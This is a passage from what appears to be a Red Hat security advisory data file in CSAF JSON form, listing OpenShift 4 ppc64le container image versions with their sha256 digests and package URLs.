"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ab150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Acc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Ab345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849386"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Ae38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847640"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3Aa6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3A06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3Af244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Ab8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848580"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3Acedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Aaf02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849682"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848754"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848221"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847491"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3Ab2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3Ad617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773855356"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3Ab33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3Ada2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848551"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845520"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Ac19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773612481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3Ad4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Aa5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848529"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3A299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845449"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Acb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Ae8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847476"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Ac9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844474"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3Ab6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849293"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845950"
}
}
},
{
